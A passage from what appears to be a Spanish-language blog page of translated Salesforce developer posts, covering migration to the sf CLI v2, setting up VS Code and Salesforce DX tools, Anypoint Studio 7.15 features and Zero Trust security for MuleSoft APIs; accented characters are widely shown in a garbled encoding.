Por 煤ltimo, no podemos recomendar lo suficiente Trailhead en t茅rminos de preparaci贸n para revisiones de seguridad. Vale la pena dedicar tiempo a la ruta Desarrollar aplicaciones web seguras y tambi茅n acabamos de renovar el m贸dulo Revisi贸n de seguridad de AppExchange , que analiza el proceso de env铆o de un extremo a otro.

Sobre el Autor

Anika Teppo es evangelista t茅cnica en Salesforce. Ha estado trabajando con el equipo de revisi贸n de seguridad de AppExchange en Salesforce desde 2017, y su funci贸n actual consiste en hacer que Salesforce Labs y las soluciones internas se revisen y publiquen en AppExchange.

Obtenga las 煤ltimas publicaciones de blog y episodios de podcasts para desarrolladores de Salesforce a trav茅s de Slack o RSS.

A帽adir a holgura Suscr铆bete a RSS

Seguir leyendo

隆Ya est谩 aqu铆 la CLI sf (v2) de Salesforce! 鈥 Parte 2 鈽侊笍

隆Ya est谩 aqu铆 la CLI sf (v2) de Salesforce! 鈥 Parte 2 鈽侊笍

Esta es una traducci贸n que desde EGA Futura ofrecemos como cortes铆a a toda la Ohana y comunidad de programadores , consultores , administradores y arquitectos de Salesforce para toda Iberoam茅rica .

El enlace a la publicaci贸n original, lo encontrar谩s al final de este art铆culo.

隆Ya est谩 aqu铆 la CLI sf (v2) de Salesforce! 鈥 Parte 2 | Blog de desarrolladores de Salesforce

La CLI (interfaz de l铆nea de comandos) de Salesforce es la piedra angular del desarrollo de Salesforce y, como cualquier otra herramienta, evoluciona con el tiempo. Esta publicaci贸n es la segunda de una serie de blogs de dos partes sobre sf (v2), la nueva y mejorada CLI de Salesforce. En la Parte 1 , echamos un vistazo a las novedades de sf (v2) y, en esta parte final, exploraremos los nuevos comandos de estilo sf y patrones de banderas y compartiremos c贸mo puede migrar desde comandos de estilo sfdx y patrones basados en banderas. en nuestra experiencia con aplicaciones de muestra . Si bien la migraci贸n puede parecer intimidante a primera vista, compartiremos algunos consejos sobre c贸mo facilitar la transici贸n.

Conozca los comandos de estilo sf

Si ha estado usando la CLI durante alg煤n tiempo, probablemente comenz贸 a notar una serie de advertencias en los comandos que usa con frecuencia, como este:

sfdx force:source:push
Warning: We plan to deprecate this command in the future. Try using the "project deploy start" command instead.禄>

Estos cambios son el resultado del trabajo continuo en Salesforce CLI Unification que comenz贸 hace varios lanzamientos (m谩s detalles en la primera parte de esta serie).

Desde entonces, cada vez que instala la CLI de Salesforce, obtiene los dos ejecutables ( sfdx y sf ). Puede usar cualquiera de estos ejecutables ya que la mayor铆a de los comandos son interoperables, pero le recomendamos que comience a usar sf en su trabajo diario para prepararse para el futuro.

Debido a que sf cubre m谩s que solo el desarrollo de la plataforma central, ofrece una nueva taxonom铆a de comandos simplificada que refleja el flujo de trabajo de un desarrollador t铆pico en lugar de las marcas, productos o funciones de Salesforce.

Un ejemplo pr谩ctico de esto es el comando sf org create . Con este nuevo comando, la intenci贸n es m谩s clara: llamas a la misma base de comandos con scratch , sandbox , shape , snapshot o user , mientras que en sfdx ten铆as que usar una combinaci贸n de diferentes comandos ( force:org:create , force:user:create ) y flags ( --type=scratch o --type=sandbox ) para obtener el mismo resultado.

Otra caracter铆stica interesante de sf es que incluye m谩s comandos visuales e interactivos, como la creaci贸n de organizaciones con la capacidad de reanudar operaciones de larga duraci贸n en caso de tiempo de espera.

Migrar al ejecutable sf

Adem谩s de simplemente cambiar el nombre del ejecutable de sfdx a sf , hay una serie de cambios que se aplican a los comandos CLI al actualizar sus proyectos. La documentaci贸n de la CLI de Salesforce proporciona una buena descripci贸n general de estos cambios, pero destacaremos los que nos afectaron durante la actualizaci贸n de nuestras aplicaciones de muestra.

Comandos sfdx comunes y sus equivalentes sf

En primer lugar, el tema force se elimin贸 de la mayor铆a de los comandos, lo cual es una buena noticia, ya que acorta los comandos. El otro cambio importante es que los temas, comandos y subcomandos, que antes estaban separados por dos puntos como en sfdx force:org:list , ahora est谩n separados por espacios, como en sf org list .

Mirando m谩s de cerca los comandos que usamos a diario cuando trabajamos en aplicaciones de muestra, aplicamos los siguientes cambios:

Comando sfdx heredado Comando sf equivalente Migraci贸n Comentarios
sfdx force:org:delete -p -u recipes sf org delete scratch -p -o recipes Se debe agregar el subcomando scratch .
El indicador de la organizaci贸n de destino cambia de -u a -o .
sfdx force:org:create -s -f config/project-scratch-def.json -d 30 -a recipes sf org create scratch -d -f config/project-scratch-def.json -y 30 -a recipes Se debe agregar el subcomando scratch .
El indicador "asignar organizaci贸n predeterminada" cambia de -s a -d .
El indicador de duraci贸n de la organizaci贸n borrador cambia de -d a -y .
sfdx force:source:push sf project deploy start Este es un cambio significativo, pero el nuevo comando funciona para todos los formatos de proyecto (fuente o metadatos).
Anteriormente, necesitaba comandos distintos.
sfdx force:user:permset:assign -n recipes sf org assign permset -n recipes El tema cambia de user a org y cambia el orden de los subcomandos.
sfdx force:data:tree:import -p data/data-plan.json sf data import tree -p data/data-plan.json
sfdx force:org:open -p lightning/n/Hello sf org open -p lightning/n/Hello
sfdx force:apex:test:run -c -r human -w 20 sf apex test run -c -r human -w 20

Si est谩 buscando otros comandos, la documentaci贸n de CLI proporciona una lista completa de comandos sfdx con sus equivalentes sf . Cada vez que reemplace un comando, aseg煤rese de revisar sus banderas en busca de cambios, especialmente si usa las banderas de formato corto (un solo car谩cter) ( -o en lugar de --target-org por ejemplo). Puede ejecutar cualquier comando con el indicador -h o --help para obtener su descripci贸n.

Automatice parte de la migraci贸n con expresiones regulares

鈩癸笍 Edici贸n del 27 de julio de 2023: en lugar de expresiones regulares, puede usar un script de migraci贸n como se documenta aqu铆 .

Cuando analizamos la migraci贸n de nuestros proyectos de aplicaciones de muestra , sab铆amos que necesitar铆amos automatizar parte del proceso, ya que hab铆a cerca de 1700 referencias a sfdx en m谩s de 200 archivos. Para obtener los resultados m谩s precisos aqu铆, aseg煤rese de agregar un espacio despu茅s de sfdx en su t茅rmino de b煤squeda y excluya la carpeta node_modules de su b煤squeda, como hicimos aqu铆:

Comenzar con una b煤squeda es un buen primer paso. Le ayuda a darse cuenta de que tendr谩 que migrar sus comandos en un par de lugares, como:

  • Scripts de integraci贸n continua
  • Guiones de desarrollo local
  • Documentaci贸n

Luego puede ir m谩s all谩 experimentando con una b煤squeda y reemplazo de expresiones regulares (RegEx) en VS Code. Este enfoque es una forma r谩pida de iniciar la migraci贸n. Funciona bien para la b煤squeda, pero no es perfecto como reemplazo, ya que algunos comandos requieren actualizaciones manuales. En cualquier caso, siempre pruebe el resultado de sus cambios antes de enviarlos a producci贸n.

Comience ejecutando esta b煤squeda RegEx y reemplace:

Tenga en cuenta el uso de tres grupos de captura encerrados entre par茅ntesis en la expresi贸n de b煤squeda y representados por signos de d贸lar seguidos de un n煤mero en la expresi贸n de reemplazo. Los grupos de captura le permiten retener din谩micamente ciertos valores (palabras como temas, comandos y subcomandos en nuestro caso) mientras realiza cambios en el resto de la l铆nea (reemplazando los separadores de dos puntos con espacios en nuestro caso).

Si desea obtener m谩s informaci贸n sobre este RegEx u otros, le recomiendo que consulte regex101.com , ya que proporciona una explicaci贸n de la sintaxis y un campo de juego para probar expresiones.

Aqu铆 hay un ejemplo de la entrada y salida en VS Code de la expresi贸n anterior (no olvide activar el modo RegEx como lo indica la flecha roja):

Notar谩 que esta primera ronda de b煤squeda y reemplazo no es perfecta ya que obtiene algunos caracteres de espacio adicionales en el texto reemplazado. Puede arreglar esto f谩cilmente ejecutando una segunda operaci贸n RegEx de b煤squeda y reemplazo como esta:

Una vez que ejecute este 煤ltimo RegEx, todav铆a hay un par de cambios manuales que necesitar谩 para operar. Como vimos anteriormente en la tabla de equivalencia de comandos, estas son las cosas clave a tener en cuenta:

  • Algunos comandos usan diferentes temas y subcomandos. Por ejemplo, sf user assign permset es incorrecto: user debe ser reemplazado por org .
  • Algunas banderas necesitan ser cambiadas. Por ejemplo, sf org create scratch -s -f config/project-scratch-def.json -d 30 -a recipes es incorrecto: el indicador -d debe reemplazarse por -y y el indicador -s debe reemplazarse por -d .

Afortunadamente, la mayor铆a de estos cambios no son demasiado dif铆ciles de aplicar y puede migrar con bastante rapidez a los comandos de estilo sf . Lo dejaremos con una vista de diferencias de GitHub que resume todos los cambios que fueron necesarios para migrar una de nuestras aplicaciones de muestra.

palabras de cierre

Eso es un resumen de esta breve descripci贸n general de la migraci贸n de los comandos sfdx -style a los comandos sf -style. Vislumbr贸 el beneficio del ejecutable sf y su nueva sintaxis. Esperamos que se beneficie de nuestra experiencia de migraci贸n y de nuestros consejos al actualizar sus proyectos.

Recursos

Sobre el Autor

Philippe Ozil es un defensor principal de desarrolladores en Salesforce, donde se enfoca en la plataforma de Salesforce. Escribe contenido t茅cnico y habla con frecuencia en conferencias. Es un desarrollador full-stack y disfruta trabajar en proyectos DevOps, rob贸tica y VR. S铆galo en Twitter @PhilippeOzil o consulte sus proyectos de GitHub @pozil .

Obtenga las 煤ltimas publicaciones de blog de desarrolladores de Salesforce y episodios de podcast a trav茅s de Slack o RSS.

Agregar a Slack Suscr铆bete a RSS

Seguir leyendo

Herramientas para desarrolladores desde cero (Parte 1 de 2) 鈽侊笍

Herramientas para desarrolladores desde cero (Parte 1 de 2) 鈽侊笍

Esta es una traducci贸n que desde EGA Futura ofrecemos como cortes铆a a toda la Ohana y comunidad de programadores , consultores , administradores y arquitectos de Salesforce para toda Iberoam茅rica .

El enlace a la publicaci贸n original, lo encontrar谩s al final de este art铆culo.

Herramientas para desarrolladores desde cero (Parte 1 de 2) | Blog de desarrolladores de Salesforce

Tanto si es un nuevo desarrollador que acaba de empezar su carrera en el ecosistema de Salesforce como si es un desarrollador experimentado de Salesforce que a煤n no se ha cambiado a nuestras nuevas herramientas para desarrolladores, esta serie de publicaciones de blog es para usted. Le mostraremos c贸mo configurar y utilizar las herramientas que pueden ayudar a todos los desarrolladores de Salesforce a ser mucho m谩s productivos y felices.

Antes de que empieces

Si es nuevo en Salesforce y no tiene una organizaci贸n (instancia de Salesforce) disponible para practicar, reg铆strese en una organizaci贸n Developer Edition . Es completamente gratis y tiene la mayor铆a de las funciones de Salesforce preinstaladas para que pruebe y aprenda. Deber谩 proporcionar un nombre de usuario en forma de direcci贸n de correo electr贸nico, pero no es necesario que sea uno real. Es solo un nombre de usuario que debe ser 煤nico en todos los productos de Salesforce. Despu茅s de solicitar una organizaci贸n, recibir谩 un correo electr贸nico con los pasos para iniciar sesi贸n. Tome nota del nombre de usuario de la organizaci贸n que proporcion贸, ya que tendr谩 que usarlo m谩s adelante.

Si es un desarrollador de Salesforce establecido y un usuario de Developer Console, este es el momento adecuado para adoptar las nuevas herramientas de desarrollador. Si bien Developer Console puede ser una forma r谩pida de cambiar algunas l铆neas de c贸digo, usar las herramientas m谩s modernas cambiar谩 las reglas del juego, ya que incluyen un mont贸n de capacidades que simplificar谩n su trabajo. Usar las nuevas herramientas requiere un cambio de h谩bitos al principio, pero te prometo que muy pronto entender谩s sus beneficios. Adem谩s, tenga en cuenta que ya no estamos invirtiendo en Developer Console, y problemas como la falta de soporte para Lightning Web Components son algo que no abordaremos.

Instalaci贸n de las herramientas de desarrollador

Los metadatos de su organizaci贸n est谩n en la nube, pero para desarrollarse de una manera m谩s productiva, desarrollar谩 localmente. El modus operandi ser谩 trabajar con los metadatos en su m谩quina local y sincronizarlos con su organizaci贸n, lo que significa recuperarlos o implementarlos cuando sea necesario.

Una alternativa al desarrollo local es usar Code Builder (Beta) , un IDE basado en web que puede iniciar desde su organizaci贸n y que tiene las herramientas de desarrollador instaladas. Sin embargo, en este blog, nos centraremos en el flujo de trabajo de desarrollo local.

El primer paso es instalar las siguientes herramientas en su m谩quina:

  • CLI de Salesforce : esta es la herramienta de interfaz de l铆nea de comandos que utilizar谩 para escribir comandos para mover su c贸digo entre su entorno local y su organizaci贸n, ejecutar pruebas, implementar datos de muestra y mucho m谩s. Si no le gusta escribir comandos en una terminal, no tema, ya que tenemos opciones alternativas como se describe en esta publicaci贸n de blog.
  • C贸digo VS : este es el IDE que usar谩 para desarrollar en su m谩quina local.
  • Java : algunas funciones en las extensiones de Salesforce para VS Code dependen de la plataforma Java, kit de desarrollo de edici贸n est谩ndar (JDK). Inst谩lelo siguiendo las instrucciones vinculadas.
  • Extensiones de Salesforce para VS Code : Este es un grupo de extensiones de VS Code que aumentan las capacidades de VSCode, exponiendo la mayor铆a de los comandos de la CLI de Salesforce en la interfaz de usuario de VS Code, para que pueda ejecutarlos con clics. Las extensiones tambi茅n agregan funciones para habilitar la depuraci贸n, facilitar las pruebas, permitirle explorar los metadatos en su organizaci贸n y m谩s.

Creaci贸n de un proyecto de Salesforce DX

Cuando trabaja con los metadatos de una organizaci贸n localmente, los archivos de metadatos deben almacenarse en una carpeta de proyecto, siguiendo una estructura determinada. Eso es lo que llamamos un proyecto de Salesforce DX.

Una vez instaladas las herramientas para desarrolladores, puede continuar y crear un proyecto de Salesforce DX que luego conectar谩 a su organizaci贸n. Una forma de hacerlo es escribir un comando que utilice la CLI de Salesforce para crear el proyecto. Puede escribir ese comando en una terminal normal.

sf project generate -n myProject

Nota: la CLI de Salesforce contiene dos ejecutables, sfdx y sf . En este blog, escribiremos los comandos utilizando el ejecutable y la sintaxis m谩s modernos, que es sf .

El indicador -n indica el nombre del proyecto. La CLI de Salesforce aplicar谩 scaffolding a un proyecto en una carpeta con ese nombre. Una vez que se crea el proyecto, puede abrirlo en VS Code, con File 鈫 Open Folder .

Gracias a las extensiones de Salesforce para VS Code, existe una forma sin escribir para ejecutar los comandos de la CLI de Salesforce. Simplemente abra la paleta de comandos de VS Code con View 鈫 Command Palette y escriba SFDX para ver todos los comandos disponibles. Tambi茅n podr铆amos haber creado el proyecto con SFDX: Create Project en lugar de escribir el comando.

Autorizar y establecer una organizaci贸n como predeterminada

Una vez que su proyecto est茅 configurado, el siguiente paso es autorizar la CLI de Salesforce para que funcione con su organizaci贸n. Comencemos esta vez con la forma de hacerlo sin escribir. Cuando abra el proyecto por primera vez, simplemente haga clic en el bot贸n Sin conjunto de organizaciones predeterminado y aparecer谩 la paleta de comandos, sugiriendo que autorice una organizaci贸n. Proceda siguiendo las instrucciones del comando.

Otra forma de hacerlo es ejecutar un comando CLI de Salesforce. Esta vez, y de ahora en adelante, le recomiendo que use el terminal integrado de VS Code para ejecutar comandos, ya que tener todas las herramientas en la misma pantalla reduce el cambio de contexto. Puede abrirlo en Terminal 鈫 New Terminal .

El comando CLI de Salesforce utilizado para autorizar una organizaci贸n es:

sf org login web -s

Luego, siga las instrucciones dadas por el comando. El indicador -s configurar谩 esa organizaci贸n como su organizaci贸n predeterminada para este proyecto. Puede ver la organizaci贸n predeterminada de su proyecto en la barra inferior de VS Code.

Todos los comandos de la CLI de Salesforce tienen varios indicadores disponibles. Por ejemplo, si desea conectarse a una zona de pruebas, puede pasar la URL de la instancia de la zona de pruebas a sf org login web usando -r . Para ver la ayuda del comando y todos sus indicadores disponibles, ejecute el comando agregando --help al final.

Cuando trabaja con varias organizaciones, ser谩 com煤n autorizar la CLI de Salesforce con varias organizaciones. Puede ver las organizaciones a las que la CLI de Salesforce tiene autorizaci贸n para acceder ejecutando sf org list . Puede cambiar la organizaci贸n predeterminada de un proyecto haciendo clic en el nombre de la organizaci贸n en la barra inferior de VS Code, como hicimos para autorizar por primera vez, o ejecutando:

sf config set target-org=your-org-username@sf.com

Perm铆tanme compartir con ustedes un 煤ltimo consejo. Las organizaciones pueden tener alias. Esto es 煤til cuando no desea recordar nombres de usuario largos o complejos. Para establecer un alias, escriba el siguiente comando.

sf alias set myalias=your-org-username@sf.com

Cuando se establece un alias, puede utilizar el alias en lugar del nombre de usuario de la organizaci贸n en cualquiera de los comandos de la CLI de Salesforce.

Implementaci贸n de metadatos en la organizaci贸n

Una vez que la CLI de Salesforce y su IDE est茅n autorizados con su organizaci贸n, y la organizaci贸n est茅 configurada como la organizaci贸n predeterminada para su proyecto, puede comenzar a desarrollar e implementar cambios. Por ejemplo, digamos que queremos crear una clase de Apex. Puede crear el archivo de metadatos que representa la clase de Apex manualmente en la carpeta classes . Sin embargo, es mucho m谩s efectivo crear la clase desde la paleta de comandos.

Tambi茅n puede crear una clase escribiendo el siguiente comando de la CLI de Salesforce:

sf apex generate class -n myClass -d force-app/main/default/classes

Una vez que su clase est茅 lista para implementarse en su organizaci贸n, hay varias formas de hacerlo. Una forma es especificar los metadatos en el comando.

sf project deploy start -m ApexClass

Una segunda forma es especificar una carpeta para implementar.

sf project deploy start -p force-app/main/default/classes

Y una tercera forma, disponible gracias a Salesforce Extensions for VS Code, es hacer clic con el bot贸n derecho en el archivo y hacer clic en Deploy This Source to Org .

Todas esas opciones le permiten ejecutar las implementaciones usted mismo. Si desea automatizar este paso e implementar un archivo cada vez que se guarda, puede establecer la configuraci贸n Implementar al guardar VS Code en "Verdadero" y ahorrar algo de tiempo.

Cuando se implementan sus metadatos, normalmente querr谩 abrir su organizaci贸n para realizar pruebas. Puede iniciar sesi贸n utilizando su navegador como de costumbre. Pero para los desarrolladores, es m谩s eficiente hacer clic en el bot贸n de abrir organizaci贸n en la barra inferior de VS Code.

Conclusi贸n

En esta publicaci贸n de blog, aprendi贸 c贸mo obtener una organizaci贸n gratuita para el desarrollo y c贸mo instalar las herramientas de desarrollo que todo desarrollador de Salesforce deber铆a usar hoy. Ha entendido c贸mo crear un proyecto y autorizarlo con su organizaci贸n y, por 煤ltimo, c贸mo implementar metadatos mediante la CLI de Salesforce o VS Code. En la Parte 2 de esta serie, aprender谩 c贸mo recuperar metadatos, trabajar con organizaciones con seguimiento de origen y usar bibliotecas de Node para cuidar la calidad de su c贸digo. Adem谩s, compartiremos otras gemas ocultas de las extensiones de Salesforce para VS Code. Si te gusta un formato de video, mira nuestro episodio de codeLive . Y si tiene preguntas, no dude en hacerlas en Salesforce Developers Trailblazer Community . 隆Est茅n atentos para la segunda publicaci贸n de blog de esta serie ma帽ana!

Sobre el Autor

Alba Rivas trabaja como Principal Developer Advocate en Salesforce. Puedes seguirla en Linkedin , Twitter o GitHub .

Obtenga las 煤ltimas publicaciones de blog de desarrolladores de Salesforce y episodios de podcast a trav茅s de Slack o RSS.

Agregar a Slack Suscr铆bete a RSS

Seguir leyendo

Anuncio de MuleSoft Anypoint Studio 7.15 con mayor rendimiento y facilidad de uso 鈽侊笍

Anuncio de MuleSoft Anypoint Studio 7.15 con mayor rendimiento y facilidad de uso 鈽侊笍

Esta es una traducci贸n que desde EGA Futura ofrecemos como cortes铆a a toda la Ohana y comunidad de programadores , consultores , administradores y arquitectos de Salesforce para toda Iberoam茅rica .

El enlace a la publicaci贸n original, lo encontrar谩s al final de este art铆culo.

anunciamos MuleSoft Anypoint Studio 7.15 con mayor rendimiento y facilidad de uso | Blog de desarrolladores de Salesforce

隆MuleSoft se complace en anunciar la disponibilidad general de Anypoint Studio 7.15 ! Con Anypoint Studio , los desarrolladores tienen acceso a un IDE de escritorio para la integraci贸n y el desarrollo de API que incluye m贸dulos predise帽ados para requisitos de integraci贸n comunes.

En MuleSoft, nuestro objetivo es capacitar a los equipos para automatizar los flujos de trabajo, brindar experiencias a los clientes y ser m谩s productivos. Con Studio 7.15, continuamos con este compromiso. Hemos mejorado la experiencia del desarrollador y mejorado el rendimiento de Studio en todos los 谩mbitos. Tambi茅n fortalecimos la experiencia de importaci贸n de activos y agregamos m谩s a las opciones de implementaci贸n de CloudHub. Siga leyendo para conocer algunos de los aspectos m谩s destacados de esta versi贸n.

Escuchamos continuamente los comentarios de la comunidad de MuleSoft para ayudarnos a mejorar nuestros productos. Algunas de las principales solicitudes de Anypoint Studio son la capacidad de incluir en la lista de permitidos los archivos de Studio de los an谩lisis antivirus y brindar soporte nativo para la arquitectura centrada en ARM. Hemos a帽adido ambos.

En 7.15, agregamos la opci贸n para que los desarrolladores excluyan los archivos de Studio del antivirus de Microsoft Defender. Esto ayudar谩 a mejorar tanto el rendimiento como la estabilidad, lo que permitir谩 a nuestros usuarios ser m谩s productivos. Para aquellos en Windows, Studio ahora ser谩 a煤n m谩s receptivo y estable.

Adem谩s, Studio ahora admite de forma nativa la arquitectura centrada en ARM. Esto significa m谩s rendimiento y mayor estabilidad para los usuarios en sistemas como macOS.

Con estas dos adiciones, estamos ayudando a nuestros usuarios a experimentar un Studio m谩s r谩pido y m谩s estable, en los principales sistemas operativos.

Cuando se trata de hacer que los desarrolladores sean productivos, los detalles importan. No basta con facilitar el desarrollo, la depuraci贸n y la implementaci贸n. Los trabajos complementarios, como la importaci贸n de artefactos y la b煤squeda de contexto, tambi茅n son importantes.

Hoy, importar desde Design Center es m谩s f谩cil. Los desarrolladores ahora obtendr谩n los siguientes detalles y capacidades al importar fragmentos y especificaciones de API desde Design Center:

  • Tipo de activo mostrado
  • Se muestra la fecha en que se actualiz贸 el activo por 煤ltima vez
  • Capacidad de b煤squeda mejorada

Con la capacidad de buscar fragmentos y especificaciones en Design Center de Studio, los usuarios ahora pueden pasar menos tiempo buscando los activos que necesitan y m谩s tiempo creando flujos de trabajo.

En Studio 7.14, brindamos a los usuarios la capacidad de implementar en CloudHub 2.0 . Con Studio 7.15, estamos mejorando esa capacidad.

Ahora, los usuarios pueden implementar y volver a implementar una aplicaci贸n Mule en CloudHub 2.0, incluso si tiene el mismo nombre y destino que una existente en CloudHub 2.0. Esto es particularmente 煤til para volver a implementar despu茅s de realizar cambios en una aplicaci贸n Mule. Como resultado, los desarrolladores pueden pasar menos tiempo lidiando con los matices de la implementaci贸n.

Con la GA de nuestra 煤ltima versi贸n de Anypoint Studio, estamos entusiasmados de ver que los desarrolladores y los equipos se vuelven a煤n m谩s productivos a medida que crean integraciones y API. Descargue Anypoint Studio 7.15 hoy y d铆ganos lo que piensa.

Srini Sekaran es responsable de gesti贸n de productos para varios productos, incluido Anypoint Studio, el IDE de MuleSoft que miles de desarrolladores utilizan a diario para crear integraciones potentes.

Obtenga las 煤ltimas publicaciones de blog de desarrolladores de Salesforce y episodios de podcast a trav茅s de Slack o RSS.

Agregar a Slack Suscr铆bete a RSS

Seguir leyendo

Seguridad Zero Trust para tus APIs usando MuleSoft 鈽侊笍

Seguridad Zero Trust para tus APIs usando MuleSoft 鈽侊笍

Esta es una traducci贸n que desde EGA Futura ofrecemos como cortes铆a a toda la Ohana y comunidad de programadores , consultores , administradores y arquitectos de Salesforce para toda Iberoam茅rica .

El enlace a la publicaci贸n original, lo encontrar谩s al final de este art铆culo.

Seguridad Zero Trust para sus API con MuleSoft | Blog de desarrolladores de Salesforce

Roma no se construy贸 en un d铆a… pero casi se arruin贸 en una noche. Eso es lo que tienen los imperios, son fr谩giles. Al igual que la confianza. Podemos extender a煤n m谩s esta analog铆a a nuestra arquitectura empresarial; se necesita mucho tiempo y un gran esfuerzo para construir una organizaci贸n exitosa y ganarse la confianza del cliente, pero un percance de seguridad puede reducir todos los escombros de sus esfuerzos.


En 2022, todos escuchamos sobre la filtraci贸n del juego GTA 6 justo antes de su fecha de lanzamiento. Esta filtraci贸n fue lo suficientemente grande como para poner en problemas financieros al editor del juego, y hubo especulaciones de que una persona interna, como un empleado, estaba involucrada. Entonces la pregunta es: "驴A qui茅n debemos confiar con la seguridad?" La seguridad es tan fuerte como el eslab贸n m谩s d茅bil.

Y la respuesta es: 鈥淣o conf铆es en nadie鈥, y eso es lo que nos lleva a Zero Trust Security (ZTS) .

ZTS es un marco arquitect贸nico que tiene como objetivo proteger a las organizaciones de amenazas de seguridad, ataques y violaciones de datos al cumplir con los protocolos de seguridad en cada punto de acceso.

Antes de ZTS, la seguridad basada en el per铆metro era el enfoque popular. En la seguridad perimetral, autenticamos y autorizamos a la entidad solo a nivel perif茅rico mediante firewalls, redes privadas virtuales, etc. Una vez que la entidad obtiene acceso, puede acceder a todos los recursos. El movimiento lateral no autorizado ha sido una de las principales preocupaciones en la seguridad perimetral.

Por el contrario, ZTS impone autenticaci贸n y autorizaci贸n en cada punto de entrada. En general, podemos aplicar ZTS a aplicaciones empresariales, aplicaciones nativas de la nube, API, etc. En esta publicaci贸n de blog, nos centraremos principalmente en implementar ZTS para API y explorar lo que MuleSoft tiene para ofrecer en lo que respecta a Zero Trust Security.

Principios b谩sicos de ZTS

Todo el concepto de ZTS se basa en los siguientes cuatro principios b谩sicos:

  • No conf铆e en nadie y verifique siempre : independientemente de la persona (cliente, director ejecutivo, desarrollador, etc.), autenticamos y autorizamos su acceso en cada etapa. Si hay m煤ltiples puntos de entrada para obtener acceso a un recurso en particular, debemos aplicar la validaci贸n en cada punto de entrada. Utilizamos Gesti贸n de Identidad y Acceso (IAM) y autenticaci贸n multifactor (MFA), y aplicamos pol铆ticas de seguridad.
  • M铆nimos privilegios y denegaci贸n predeterminada : De forma predeterminada, se denegar谩 el acceso a todos los recursos. Una vez que la entidad est谩 autenticada y autorizada, seg煤n la credencial, podemos otorgar acceso con los privilegios m铆nimos. Necesitamos asegurarnos de que estamos autorizando solo los recursos esenciales. Podemos controlar el acceso para diferentes roles utilizando el modelo de acceso basado en roles y modificar los privilegios en consecuencia.
  • Inspecci贸n completa y visibilidad del flujo de datos : debemos asegurarnos de que haya transparencia en el flujo de datos. Debemos tener cuidado con el registro de la carga 煤til, ya que podr铆a involucrar informaci贸n confidencial. Si hay m煤ltiples sistemas finales y API involucrados, deber铆amos tener una visi贸n general de 360 grados de la arquitectura del sistema y el flujo de datos. De esta forma, podemos controlar el mal uso de informaci贸n sensible y la fuga de informaci贸n.
  • Gesti贸n de control centralizado: Para implementar fuertes medidas de seguridad, necesitamos un centro de gesti贸n centralizado. Esto nos permitir谩 aplicar medidas de seguridad en todas las entidades. Tambi茅n nos da un control completo sobre la infraestructura de la organizaci贸n desde una perspectiva de seguridad. API Manager es un lugar para dejar de administrar aplicaciones API, Mule y Non-MuleSoft. Puede administrar, proteger y gobernar aplicaciones con la ayuda de API Manager.

Implementaci贸n de seguridad de confianza cero

Es muy probable que su infraestructura existente ya tenga algunas medidas de seguridad implementadas. Para implementar ZTS, no tiene que comenzar a construir todo desde cero o reconstruir su infraestructura de seguridad existente. Todo lo que necesita hacer es planificar bien las medidas de seguridad e identificar las lagunas. Puede lograr esto adoptando un enfoque de microsegmentaci贸n o seguridad en capas.

Microsegmentaci贸n o enfoque de seguridad en capas

Esta es una t茅cnica en la que dividimos la infraestructura en niveles o segmentos y luego aplicamos medidas de seguridad. Tambi茅n podemos considerarlo como "divide y vencer谩s", donde estamos dividiendo la gran infraestructura en fragmentos m谩s peque帽os para una mejor seguridad y control. Este enfoque nos brinda seguridad a nivel granular.

Podemos implementar los principios b谩sicos de ZTS de la siguiente manera:

  1. Enumere todos los activos, sistemas finales, aplicaciones, datos y puntos finales de API. Comprobar el estado del dispositivo y del sistema. Implemente la autenticaci贸n de extremo a extremo y no permita el acceso lateral.
  2. Resuma el flujo de datos y las conexiones. Dise帽e su infraestructura actual.
  3. En funci贸n de la criticidad de la informaci贸n, identificar las pol铆ticas de seguridad a aplicar en cada punto de entrada. Implemente el acceso basado en roles y pol铆ticas.
  4. Haga cumplir la implementaci贸n de seguridad a trav茅s de un sistema de gesti贸n central y supervise su infraestructura.

ZTS con MuleSoft

Es posible que ya est茅 familiarizado con las capacidades de integraci贸n de MuleSoft y c贸mo aprovechar la conectividad dirigida por API para construir una infraestructura componible. Lo siguiente lo ayudar谩 a comprender c贸mo implementar ZTS usando las capacidades de seguridad de MuleSoft.

Tomemos en consideraci贸n una arquitectura componible creada con conectividad dirigida por API (vea la imagen a continuaci贸n). La l铆nea exterior punteada en rojo denota seguridad basada en el per铆metro, ya que estamos aplicando seguridad en un nivel perif茅rico. Para aplicar ZTS, aplicaremos medidas de seguridad en cada capa de la API y en todo el punto final de la API. Las l铆neas internas de puntos rojos en la capa de proceso indican que hemos aplicado una pol铆tica de eliminaci贸n de encabezado y autenticaci贸n b谩sica en el punto de entrada de la capa de experiencia a la capa de proceso.


驴C贸mo logramos ZTS con MuleSoft?

  1. Aplicaci贸n de pol铆ticas de seguridad listas para usar: MuleSoft ofrece varias pol铆ticas de seguridad listas para usar, desde la autenticaci贸n b谩sica hasta OAuth y JWT. Podemos aplicar f谩cilmente estas pol铆ticas en nuestro nivel de puerta de enlace API utilizando Anypoint API Manager . Tambi茅n podemos personalizar estas pol铆ticas para cumplir con los est谩ndares y regulaciones de nuestra organizaci贸n.
  2. Creaci贸n de entornos seguros: podemos aplicar la protecci贸n contra amenazas en cada per铆metro perimetral de forma autom谩tica mediante Anypoint Security en una plataforma que cumpla con las normas ISO 27001, SOC 1 y 2, HIPAA, PCI DSS y GDPR.
  3. Registro y monitoreo efectivos: podemos lograr transparencia utilizando las capacidades de registro y monitoreo de MuleSoft, y usar API Catalog CLI para descubrir y catalogar nuestras API.
  4. Gobernanza continua : utilizamos Anypoint API Governance para identificar, validar y hacer cumplir las mejores pr谩cticas de seguridad para las API, como OWASP Top 10, desde el dise帽o hasta la implementaci贸n.

Conclusi贸n


En este blog, hemos aprendido sobre Zero Trust Security y sus principios b谩sicos. Tambi茅n somos conscientes de la diferencia entre la seguridad basada en el per铆metro y ZTS, y por qu茅 ZTS es importante. Adem谩s, hemos aprendido c贸mo podemos implementar ZTS usando MuleSoft y las capacidades de seguridad que MuleSoft tiene para ofrecer.

Recursos

Sobre el Autor

Akshata Sawant es promotora s茅nior de desarrolladores en Salesforce. Es autora, bloguera y oradora, y coautora del t铆tulo, MuleSoft for Salesforce Developers . Akshata es un miembro activo de la comunidad de MuleSoft y ex embajador de MuleSoft. Le encanta leer, bailar, viajar y la fotograf铆a, y es una gran entusiasta de la comida. S铆guela en Twitter y LinkedIn.

Obtenga las 煤ltimas publicaciones de blog de desarrolladores de Salesforce y episodios de podcast a trav茅s de Slack o RSS.

Agregar a Slack Suscr铆bete a RSS

Seguir leyendo

Uso del flujo de credenciales del cliente para una autenticaci贸n API m谩s sencilla 鈽侊笍

